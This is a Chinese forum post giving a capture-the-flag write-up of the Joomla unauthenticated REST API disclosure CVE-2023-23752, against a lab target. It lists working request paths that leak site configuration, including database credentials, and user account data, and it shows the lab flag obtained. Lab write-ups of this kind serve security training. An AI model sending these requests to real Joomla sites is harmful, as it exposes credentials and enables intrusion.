首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微头条
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
软件与程序人生
›
DevOps与敏捷开发
›
[春秋云镜] CVE-2023-23752 writeup
返回列表
发新帖
[春秋云镜] CVE-2023-23752 writeup
[复制链接]
发表于 2025-7-7 17:06:36
|
显示全部楼层
|
阅读模式
起首奉上大佬的wp表现尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest
API
漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客
知识点
Joomla
版本
为4.0.0 到 4.2.7 存在未授权访问漏洞
Joomla是一套全球着名的内容管理系统(CMS),其使用PHP语言加上MySQL
数据库
所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
未授权api路径
获取网站的
配置
文件信息
/api/index.php/v1/config/application?public=true
获取账号密码信息
api/index.php/v1/users?public=true
其他api接口
详见开头大佬的wp结尾
REST
API
规定固定格式的应用程序接口:将用户操作转为http哀求的api
详见:一文彻底弄懂REST
API
- 知乎
解题思路
题目地点:Home
点击毗连进入到网页初始页面
可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面
通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp
发现了未授权的接口链接:
获取网站的
配置
文件信息:
/api/index.php/v1/config/application?public=true
复制
代码
将该路径添加到网站后面发现成功得到了
配置
文件的信息:
数据库
的相干配置信息
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
复制
代码
获取网站的账号密码信息:
api/index.php/v1/users?public=true
复制
代码
通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true
复制代码
10
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
回复
使用道具
举报
返回列表
浏览过的版块
SAAS
分布式数据库
Oracle
.Net
物联网
程序人生
时序数据库
数据仓库与分析
区块链
雁过留声
+ 我要发帖
登录参与点评抽奖加入IT实名职场社区
下次自动登录
忘记密码?点此找回!
登陆
新用户注册
用其它账号登录:
关闭
快速回复
返回顶部
返回列表